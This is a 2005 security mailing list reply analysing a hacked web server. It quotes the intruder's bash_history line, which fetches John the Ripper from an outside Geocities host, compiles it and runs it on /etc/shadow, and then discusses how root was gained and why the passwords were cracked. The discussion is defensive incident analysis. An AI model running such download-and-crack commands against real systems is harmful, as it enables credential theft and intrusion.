Security Incidents mailing list archives
Re: SSH compiled with backdoor
From: Javier Fernandez-Sanguino <jfernandez () germinus com>
Date: Tue, 30 Aug 2005 12:43:31 +0200
steve () example org wrote:
Hi! One of my web servers was hacked on July 17, 2005. bash_history showed: w wget geocities.com/cretu_2004/john-1.6.tar.gz;tar zxvf john-1.6.tar.gz;rm -rf john-1.6.tar.gz;cd john-1.6/src;make linux-x86-any-elf;cd ../run;./john /etc/shadow
(...)
According to john, a couple of users had weak passwords, but root seemed well protected. From looking in all the bash_history, it appears the hacker came in from the website account, and did an su from there.
He might have escalated privileges to root from the website account using a kernel root exploit. You did not mention whose bash_history you provided but from the above john run is evident that he is already running as root (as he is able to read /etc/shadow).
I wonder why he cracked those passwords if he already had root access. Maybe he wanted to use them to propagate the attack to nearby systems or to feed the vulnerable passwords to his personal password file.
BTW, 'securedro' seems to have been removed from Geocities, but not 'cretu_2004' (where the john sources are). The john sources downloaded from there, though, seem to be the same as downloaded from Openwall. I expected them to have "improved" the run/password.lst and add common (for them) passwords there.
Regards Javier
Current thread:
- SSH compiled with backdoor steve (Aug 29)
- Re: SSH compiled with backdoor Francesca Smith (Aug 29)
- Re: SSH compiled with backdoor Javier Fernandez-Sanguino (Aug 30)
- Message not available
- Re: SSH compiled with backdoor VeNoMouS (Aug 30)